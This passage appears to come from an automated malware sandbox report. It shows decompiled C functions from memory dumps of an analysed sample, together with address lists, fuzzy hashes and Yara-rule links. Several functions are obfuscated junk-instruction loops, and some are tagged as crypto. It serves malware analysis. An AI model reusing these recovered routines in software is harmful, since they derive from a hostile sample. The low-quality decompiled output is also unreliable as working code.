						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x72482d93
0x72482d98
0x72482da0
0x72482da9
0x72482db3
0x72482dba
0x72482dc3
0x72482dce
0x72482dd6
0x72482ddf
0x72482dea
0x72482df0
0x72482df5
0x72482dfe
0x72482e09
0x72482e11
0x72482e1a
0x72482e25
0x72482e2d
0x72482e36
0x72482e41
0x72482e49
0x72482e52
0x72482e5d
0x72482e65
0x72482e6e
0x72482e80
0x72482e83
0x72482f9f
0x72482fa4
0x72482e89
0x72482e89
0x72482e8c
0x72482e8e
0x72482e91
0x72482e91
0x72482ef6
0x72482efb
0x72482efd
0x72482f03
0x72482f05
0x72482f0b
0x72482f0d
0x72482f10
0x72482f16
0x00000000
0x00000000
0x72482f72
0x72482f78
0x72482f7a
0x72482f80
0x72482f82
0x72482f87
0x72482f88
0x72482f8b
0x72482f8e
0x72482f91
0x72482f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72482f97
0x72482fae
0x72482fae
0x00000000

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 2cd00995dedf237ac552ce95a692320601d9eaf14ae9e94b549b68800733fe02
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: E15160B3E14A214BD318CE09CC40635B792FFD8312B5B81BEDD1A9B357CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 025D2E2F, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621d09871b3c6f18d6d89be277ea6c17279b36dc3c5e2c7dc20980ffc35a834f
Instruction ID: 0b945c3692904ff2aafb68f30fc79785aefb95d2412cf6841b7947c7003a41d8
Opcode Fuzzy Hash: 621d09871b3c6f18d6d89be277ea6c17279b36dc3c5e2c7dc20980ffc35a834f
Instruction Fuzzy Hash: A051DC74500206EBCB24DF28C881ABE7BF9FF49314F1048AEE882C7291E770D851CB69

Uniqueness

Uniqueness Score: -1.00%

Function 7249C4E6, Relevance: .2, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E7249C4E6() {
				signed int _t12;
				void* _t17;
				signed char _t18;
				signed int _t19;
				void* _t22;
				signed int _t24;
				signed int _t27;
				signed int _t29;
				intOrPtr _t31;

				asm("adc eax, 0xdc439e3c");
				if(_t22 + 1 <= 0) {
					__edx =  *0x961e0b7f * 0xa4eb;
					__ecx = __ecx | 0x8f540fcf;
					__esi = __esi -  *0x1c7fc519;
					__edi = __edi + 1;
					__esi = __esi +  *0x960d6f1b;
					 *0x2c51c089 =  *0x2c51c089 | __edi;
					_t6 = __esi;
					__esi =  *0xe83e07db;
					 *0xe83e07db = _t6;
					asm("rcr dword [0xb31dd43f], 0x92");
					_pop( *0x585dfe83);
					if(__dl < 0x38) {
						 *0x2b0e6d79 =  *0x2b0e6d79 << 0xa1;
						 *0xbe1d0711 =  *0xbe1d0711 - __ebp;
						__esp = __esp ^  *0x152a676d;
						__ecx = __ecx |  *0xe9012261;
						 *0xaed0e80a =  *0xaed0e80a & __bh;
						asm("rcr dword [0xd360a1c8], 0x3d");
						__bh = __bh ^ 0x0000008a;
						__eax = __eax - 0x6c13b307;
						_push(__edi);
						__esi = __esi +  *0x6e0c5cb8;
						 *0xd0301f23 =  *0xd0301f23 & __ebp;
						 *0x385a200d =  *0x385a200d >> 0x50;
						__ecx = __ecx - 1;
						__ebx = __ebx | 0x3129466e;
						asm("rcr byte [0x27e6da0c], 0x3b");
						 *0x6bd670dd =  *0x6bd670dd - __edx;
						__edi = __edi - 1;
						__ebp = __ebp +  *0xbf51fb9;
						if(__ebp == 0) {
							__eax = __eax |  *0x5c9e107b;
							asm("adc esp, 0xbf0252cd");
							 *0x53b5cec0 =  *0x53b5cec0 - __ebp;
							__ebp = __ebp +  *0x1e02579a;
							_pop(__ebx);
							 *0x1b53129c =  *0x1b53129c - __edx;
							asm("adc [0x3ebf1b92], edi");
							 *0xd93a10f8 =  *0xd93a10f8 - __edi;
							 *0xb915d61e =  *0xb915d61e & __edi;
							__edi = __edi | 0x7b0bf51f;
							 *0x51c451d =  *0x51c451d & __ecx;
							__dl =  *0x17dab00a;
							 *0x3818e582 =  *0x3818e582 & __ah;
							__edi = __edi + 0x60648f2e;
							__edx = __edx ^  *0xc87e1d1f;
							__edi = __edi | 0xbb3d5ea1;
							 *0x12f2b7bd =  *0x12f2b7bd >> 0x87;
							asm("sbb [0x1210e03], esi");
							asm("sbb [0xe296f467], edi");
							asm("movsw");
							__edx = __ebx;
							asm("rol dword [0x2a8205ee], 0x87");
							if(( *0xa11ce904 & __bh) <= 0) {
								__esp =  *0x1f71cf7f * 0xd8d6;
								 *0x3516dcf2 =  *0x3516dcf2 >> 0x86;
								 *0xbb4b6719 =  *0xbb4b6719 + __esp;
								__edi = __edi -  *0x980fbc6f;
								 *0x79585dfe = __edx;
								__ebp = __ebp + 0xa9dc156d;
								__ebp = __ebp ^  *0x36399315;
								asm("lodsb");
								__ebx = __ebx ^  *0xdcf8d662;
								if(__ebx == 0) {
									asm("adc bl, 0x14");
									__ebp = __ebp &  *0x1b85386c;
									asm("ror byte [0xb310c02], 0x86");
									__eax = __eax ^  *0x699f07f8;
									__esp =  *0x8e6cc169 * 0xbd85;
									asm("adc [0x4cd71112], dl");
									asm("sbb cl, [0x434793e5]");
									_push(__edx);
									__ebx = __ebx |  *0xde71df3f;
									__dl = __dl ^ 0x00000014;
									__eax =  *0xf7c1f26a * 0x107b;
									__edi = __edi + 1;
									__edi = __edi -  *0xc3130d0d;
									 *0x76128000 =  *0x76128000 & __ah;
									asm("adc bl, 0xa2");
									asm("stosb");
									_push(__edi);
									asm("adc [0x9c5b1e02], al");
									__edi = __edi - 0xdcff820d;
									__esi = __esi &  *0x82c33a0f;
									if(__ecx != 0) {
										__ebp = __ebp ^  *0x1a646374;
										_t11 = __esp;
										__esp =  *0x42a8205;
										 *0x42a8205 = _t11;
									}
								}
							}
						}
					}
				}
				L1:
				asm("sbb esp, [0x91ed4609]");
				 *0x4f9ebbde =  *0x4f9ebbde | _t29;
				 *0x4f0dc00c =  *0x4f0dc00c & _t19;
				_t27 = _t27 &  *0xfdf527f5;
				asm("adc dh, [0xe865f682]");
				_t18 = _t18 | 0x000000e0;
				_pop(_t24);
				asm("sbb edi, [0x6341631f]");
				_push(_t17);
				asm("rol dword [0x44580c66], 0xaf");
				asm("adc ebp, [0x5c9b3ff]");
				if(((_t24 |  *0x180c5fba) & 0x3c693793) < 0) {
					_t18 = _t18 | 0x44830d71;
					asm("cmpsw");
					_t17 = _t17 + 1;
					 *0xeb8796f7 =  *0xeb8796f7 - _t31;
					_push(_t18);
					if( *0xeb8796f7 < 0) {
						asm("sbb ecx, [0x5f8c8e71]");
						asm("rcr dword [0xf191e413], 0x15");
						asm("adc esi, [0xa2c14a91]");
						asm("sbb esi, [0x959e7f2f]");
						asm("sbb edi, [0x6971c66e]");
						_t18 = _t18 ^  *0x21d9a8f9;
						_t17 = _t17 - 0xd7;
						_t27 = _t27 +  *0x7bb225ba &  *0x84dbc09;
						_pop(_t12);
						 *0x6b5a6b28 =  *0x6b5a6b28 & _t18;
						asm("sbb ecx, [0x247f05c0]");
						_t29 = _t29 -  *0x3be23cb8 + 1;
						_t19 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
						_push( *0x194e49da);
						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
						_t3 = _t31;
						_t31 =  *0x46ef4e9e;
						 *0x46ef4e9e = _t3;
						 *0xb3184a0a =  *0xb3184a0a ^ _t18;
						 *0x63d6250f =  *0x63d6250f ^ _t12;
					}
				}
				goto L1;
			}

0x7249c4e6
0x7249c4ec
0x7249c4f2
0x7249c4fc
0x7249c502
0x7249c508
0x7249c509
0x7249c515
0x7249c51e
0x7249c51e
0x7249c51e
0x7249c524
0x7249c52b
0x7249c531
0x7249c537
0x7249c53e
0x7249c547
0x7249c54d
0x7249c553
0x7249c559
0x7249c560
0x7249c563
0x7249c568
0x7249c569
0x7249c56f
0x7249c575
0x7249c57e
0x7249c585
0x7249c58b
0x7249c592
0x7249c598
0x7249c599
0x7249c59f
0x7249c5a5
0x7249c5ab
0x7249c5b1
0x7249c5b7
0x7249c5bd
0x7249c5be
0x7249c5c4
0x7249c5ca
0x7249c5d0
0x7249c5d6
0x7249c5dc
0x7249c5e2
0x7249c5e8
0x7249c5ee
0x7249c5f4
0x7249c5fb
0x7249c601
0x7249c608
0x7249c60e
0x7249c614
0x7249c616
0x7249c617
0x7249c624
0x7249c62a
0x7249c634
0x7249c641
0x7249c647
0x7249c64d
0x7249c653
0x7249c659
0x7249c65f
0x7249c660
0x7249c666
0x7249c672
0x7249c675
0x7249c67b
0x7249c682
0x7249c688
0x7249c692
0x7249c698
0x7249c69e
0x7249c69f
0x7249c6a5
0x7249c6a8
0x7249c6b2
0x7249c6b3
0x7249c6b9
0x7249c6bf
0x7249c6c2
0x7249c6c3
0x7249c6c4
0x7249c6ca
0x7249c6d0
0x7249c6e2
0x7249c6e8
0x7249c6f4
0x7249c6f4
0x7249c6f4
0x7249c6f4
0x7249c6e2
0x7249c666
0x7249c624
0x7249c59f
0x7249c531
0x7249b8d6
0x7249b8d6
0x7249b8dc
0x7249b8e2
0x7249b8e8
0x7249b8ee
0x7249b8f4
0x7249b8f7
0x7249b904
0x7249b90a
0x7249b911
0x7249b918
0x7249b924
0x7249b926
0x7249b92c
0x7249b92e
0x7249b92f
0x7249b935
0x7249b936
0x7249b938
0x7249b93e
0x7249b945
0x7249b94b
0x7249b951
0x7249b97d
0x7249b983
0x7249b989
0x7249b98f
0x7249b990
0x7249b996
0x7249b9a2
0x7249b9a3
0x7249b9a9
0x7249b9af
0x7249b9b6
0x7249b9b6
0x7249b9b6
0x7249b9bc
0x7249b9c2
0x7249b9c2
0x7249b936
0x00000000

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b64ee4b23312852b25963871ee74ec7356c84e3383aa27d700dba619d23213d
Instruction ID: 1b398c2523a38f38cfadfb8526a765a024f6fde2607767c8293818b622cd87c6
Opcode Fuzzy Hash: 0b64ee4b23312852b25963871ee74ec7356c84e3383aa27d700dba619d23213d
Instruction Fuzzy Hash: 15716832919395CFD706CF78DC9AA813FB2F799324749424EC8A1675C2D7742115CF89

Uniqueness

Uniqueness Score: -1.00%

Function 7249C130, Relevance: .1, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E7249C130(void* __ebx, signed char __ecx, void* __edx, void* __edi, signed int __esi) {
				signed int _t23;
				void* _t28;
				signed char _t29;
				signed int _t31;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t42;
				intOrPtr _t43;

				_t38 = __esi;
				_t29 = __ecx;
				_t28 = __ebx;
				asm("sbb ecx, [0xc90f11e9]");
				 *0x488dd33c =  *0x488dd33c << 0x8d;
				_t31 = __edx + 1;
				 *0x9dabb6a9 =  *0x9dabb6a9 << 0x3c;
				_push(__ecx);
				_t43 = _t42 +  *0xa319fb19;
				if(_t43 >= 0) {
					asm("sbb ecx, [0x7088dd83]");
					asm("movsb");
					__ecx = __ecx +  *0xb7a4cef7;
					_pop(__ebx);
					__edi = __edi - 0xc9c4dfa1;
					asm("sbb edi, [0xdf16171e]");
					_pop( *0xdec029de);
					__dh = __dh ^ 0x000000d7;
					asm("sbb [0xd01cd431], ebp");
					asm("adc [0x8f0e03f7], ebp");
					__dl = __dl | 0x000000e3;
					__edx = __edx + 1;
					__ebx = __ebx - 1;
					asm("adc [0x63b6b0f3], edx");
					asm("movsw");
					asm("sbb [0x472615d7], cl");
					 *0x1e84702 =  *0x1e84702 << 0x68;
					 *0xfd08110c =  *0xfd08110c >> 0xb;
					__esp = __esp | 0x64c8a78b;
					asm("sbb eax, 0xac9a661");
					asm("sbb edi, 0xc39fcbf7");
					asm("sbb dh, [0x9a0492b1]");
					 *0x7e1db308 =  *0x7e1db308 + __cl;
					_push(__ebp);
					asm("lodsb");
					__ecx = __ecx - 1;
					asm("sbb ebp, 0x91e7b1f3");
					asm("sbb edx, [0x4e4308cd]");
					_t8 = __cl;
					__cl =  *0xbeedfca0;
					 *0xbeedfca0 = _t8;
					__ch = __ch ^ 0x000000e7;
					 *0xcb69d78d =  *0xcb69d78d >> 0xa2;
					_push(__esi);
					__ch = __ch & 0x000000e0;
					_push( *0x2212030e);
					__edx = __edx & 0x8af1def4;
					 *0x4a6472ce =  *0x4a6472ce >> 0xa9;
					asm("adc dl, [0x55a3a680]");
					asm("cmpsw");
					_push(__ebx);
					asm("rcr byte [0xa7b130c], 0x42");
					__cl =  *0x403b078a;
					 *0x403b078a =  *0xbeedfca0;
					_t14 = __ebp;
					__ebp =  *0xd812b313;
					 *0xd812b313 = _t14;
					__dl = __dl |  *0x77b512b3;
					__esi = __esi + 1;
					if(__esi < 0) {
						__ebx =  *0x69051c7d * 0xa8a2;
						_t15 = __ecx;
						__ecx =  *0xf51fb90f;
						 *0xf51fb90f = _t15;
						 *0xc0157b0b =  *0xc0157b0b << 0xed;
						__edi =  *0x1a9705a9;
						asm("adc [0xb8885087], ecx");
						__ecx =  *0xf51fb90f &  *0x6c104dcf;
						asm("adc [0x21b8538], cl");
						 *0xf8fc70d =  *0xf8fc70d << 0x92;
						 *0x579c54b0 =  *0x579c54b0 >> 0xbb;
						asm("ror byte [0x94728680], 0x58");
						asm("sbb ecx, [0x5c135f8e]");
						_push( *0xe4441a27);
						_push( *0xa87ed9a1);
						__ecx =  *0x9149b26a * 0x1a4a;
						asm("adc ebp, [0x393d670e]");
						 *0xae60ea38 =  *0xae60ea38 | __cl;
						 *0x8205a7fd =  *0x8205a7fd |  *0x9149b26a * 0x00001a4a;
						asm("sbb ch, 0x2a");
						__ah = __ah -  *0x480ce904;
						_push(__esp);
						asm("sbb ebp, 0x62de491d");
						if(( *0xe2da8821 & __esi) > 0) {
							goto L1;
						} else {
							__ecx =  *0x660fbd7f * 0xaf3c;
							__esp = __esp - 1;
							asm("sbb edi, [0x62245aeb]");
							 *0x76ef4f9f =  *0x76ef4f9f ^ __edi;
							_push( *0x104e20ba);
							_t22 = __eax;
							__eax =  *0xa10cb0ce;
							 *0xa10cb0ce = _t22;
							 *0xae899f3b =  *0xae899f3b << 0x33;
							_push( *0x5794b38f);
							asm("sbb bh, 0x2");
							return  *0xa10cb0ce;
						}
					}
				}
				L1:
				asm("sbb esp, [0x91ed4609]");
				 *0x4f9ebbde =  *0x4f9ebbde | _t40;
				 *0x4f0dc00c =  *0x4f0dc00c & _t31;
				_t38 = _t38 &  *0xfdf527f5;
				asm("adc dh, [0xe865f682]");
				_t29 = _t29 | 0x000000e0;
				_pop(_t35);
				asm("sbb edi, [0x6341631f]");
				_push(_t28);
				asm("rol dword [0x44580c66], 0xaf");
				asm("adc ebp, [0x5c9b3ff]");
				if(((_t35 |  *0x180c5fba) & 0x3c693793) < 0) {
					_t29 = _t29 | 0x44830d71;
					asm("cmpsw");
					_t28 = _t28 + 1;
					 *0xeb8796f7 =  *0xeb8796f7 - _t43;
					_push(_t29);
					if( *0xeb8796f7 < 0) {
						asm("sbb ecx, [0x5f8c8e71]");
						asm("rcr dword [0xf191e413], 0x15");
						asm("adc esi, [0xa2c14a91]");
						asm("sbb esi, [0x959e7f2f]");
						asm("sbb edi, [0x6971c66e]");
						_t29 = _t29 ^  *0x21d9a8f9;
						_t28 = _t28 - 0xd7;
						_t38 = _t38 +  *0x7bb225ba &  *0x84dbc09;
						_pop(_t23);
						 *0x6b5a6b28 =  *0x6b5a6b28 & _t29;
						asm("sbb ecx, [0x247f05c0]");
						_t40 = _t40 -  *0x3be23cb8 + 1;
						_t31 = 0x00000010 -  *0xa714619 ^  *0xb2fee9ec;
						_push( *0x194e49da);
						 *0x15750ab3 =  *0x15750ab3 >> 0x8e;
						_t3 = _t43;
						_t43 =  *0x46ef4e9e;
						 *0x46ef4e9e = _t3;
						 *0xb3184a0a =  *0xb3184a0a ^ _t29;
						 *0x63d6250f =  *0x63d6250f ^ _t23;
					}
				}
				goto L1;
			}

0x7249c130
0x7249c130
0x7249c130
0x7249c130
0x7249c136
0x7249c13d
0x7249c13e
0x7249c145
0x7249c146
0x7249c14c
0x7249c158
0x7249c15e
0x7249c165
0x7249c16b
0x7249c16c
0x7249c172
0x7249c178
0x7249c17e
0x7249c181
0x7249c187
0x7249c199
0x7249c19c
0x7249c19d
0x7249c19e
0x7249c1a4
0x7249c1a6
0x7249c1b1
0x7249c1b8
0x7249c1bf
0x7249c1c5
0x7249c1ca
0x7249c1d0
0x7249c1d6
0x7249c1dc
0x7249c1dd
0x7249c1de
0x7249c1df
0x7249c1e5
0x7249c1eb
0x7249c1eb
0x7249c1eb
0x7249c1f1
0x7249c1f4
0x7249c1fb
0x7249c202
0x7249c205
0x7249c20b
0x7249c211
0x7249c218
0x7249c21e
0x7249c220
0x7249c221
0x7249c22e
0x7249c22e
0x7249c234
0x7249c234
0x7249c234
0x7249c23a
0x7249c240
0x7249c241
0x7249c247
0x7249c251
0x7249c251
0x7249c251
0x7249c257
0x7249c25e
0x7249c264
0x7249c270
0x7249c276
0x7249c27c
0x7249c283
0x7249c28a
0x7249c291
0x7249c297
0x7249c29d
0x7249c2a9
0x7249c2b3
0x7249c2b9
0x7249c2bf
0x7249c2c5
0x7249c2c8
0x7249c2d4
0x7249c2d5
0x7249c2db
0x00000000
0x7249c2e1
0x7249c2e1
0x7249c2eb
0x7249c2ec
0x7249c2f2
0x7249c2f8
0x7249c2fe
0x7249c2fe
0x7249c2fe
0x7249c304
0x7249c30b
0x7249c311
0x7249c31a
0x7249c31a
0x7249c2db
0x7249c241
0x7249b8d6
0x7249b8d6
0x7249b8dc
0x7249b8e2
0x7249b8e8
0x7249b8ee
0x7249b8f4
0x7249b8f7
0x7249b904
0x7249b90a
0x7249b911
0x7249b918
0x7249b924
0x7249b926
0x7249b92c
0x7249b92e
0x7249b92f
0x7249b935
0x7249b936
0x7249b938
0x7249b93e
0x7249b945
0x7249b94b
0x7249b951
0x7249b97d
0x7249b983
0x7249b989
0x7249b98f
0x7249b990
0x7249b996
0x7249b9a2
0x7249b9a3
0x7249b9a9
0x7249b9af
0x7249b9b6
0x7249b9b6
0x7249b9b6
0x7249b9bc
0x7249b9c2
0x7249b9c2
0x7249b936
0x00000000

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4038ca7b8b95083aaefe28803c4f7b6095821a965a3d673a155e5a7340f24422
Instruction ID: dad22150491ee864dfec4d6ba82e4413f5d1a21ce4260d924e3dc5d6cc8ecb69
Opcode Fuzzy Hash: 4038ca7b8b95083aaefe28803c4f7b6095821a965a3d673a155e5a7340f24422
Instruction Fuzzy Hash: C1612F32609795CFDB1ACF38D896B413FB6F386724709438ED9A2535D2D7312119CB88

Uniqueness

Uniqueness Score: -1.00%

Function 025A4680, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0708d675f17bfbf6f644356900658bad27a7d2a87f8a22717660fd75b02866
Instruction ID: 8cae4035b194abfd85dd5a247f90f874113d51be362d633a45ba268949269021
Opcode Fuzzy Hash: 0d0708d675f17bfbf6f644356900658bad27a7d2a87f8a22717660fd75b02866
Instruction Fuzzy Hash: 8C416870204B958FDB688F65C5B2B7B37E9FF45355F05481EEA834B581C7B09842CB28

Uniqueness

Uniqueness Score: -1.00%

Function 02625955, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a7b93f2672e4f86edfc0fc59c1cb4addbfeac1add8df0d9eef249d7c964e38
Instruction ID: 7ac14e4143137db70bbf782af8a6bd6150db7476c8364e49fb89b5704aebe459
Opcode Fuzzy Hash: c8a7b93f2672e4f86edfc0fc59c1cb4addbfeac1add8df0d9eef249d7c964e38
Instruction Fuzzy Hash: 5841E434504AA6DADB38CF29C4816F6BBF1BF09318F548849E4D68B651D336E85ECF60

Uniqueness

Uniqueness Score: -1.00%

Function 72481030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E72481030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x72481030
0x7248105b
0x7248105d
0x72481063
0x72481065
0x72481065
0x72481071
0x72481076
0x7248107c
0x724810ac
0x724810ae
0x724810b4
0x724810ba
0x724810bc
0x724810bc
0x724810cb
0x724810d0
0x724810d6
0x72481101
0x72481103
0x72481109
0x7248110f
0x72481111
0x72481111
0x72481120
0x72481128
0x7248112b
0x7248114f
0x72481156
0x7248115d
0x72481169
0x7248116c
0x7248116f
0x72481173

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 47b383f01452d80e186b618947760d21cf283e1c6a3d50761ab7b9c191177758
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: DE3180116597F10ED30E836D48B9A75AED18E9720174EC2FEDADB6F2F3C0888408D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 025A26F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: a49f7e85a03a51a17ceef068cfb6a19be9eb65e533cf2a853597759e83c43823
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: A7F02230324049ABCB09EA188D7377E37D6FB94300F54C438ED4ECB250D635DA00C694

Uniqueness

Uniqueness Score: -1.00%

Function 72486ABE, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E72486ABE() {

				asm("adc ebp, [ebp+ecx*8+0x6b3aa8a4]");
				return 1;
			}

0x72486abe
0x72486ad4

Memory Dump Source

Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
Instruction ID: 2a283f07abafddba1a69a7c886669618796b812e570c7ba05b4463204ccdd17a
Opcode Fuzzy Hash: b1bf18d57505eb825740051dd8bb016d40b7860fd4b4a4fcac00b0647f0f7465
Instruction Fuzzy Hash: A3B09233B152080ADA205C4CB8412B4F3ACEB47325F2123A7EC08A72006186E4620688

Uniqueness

Uniqueness Score: -1.00%

Function 02590078, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

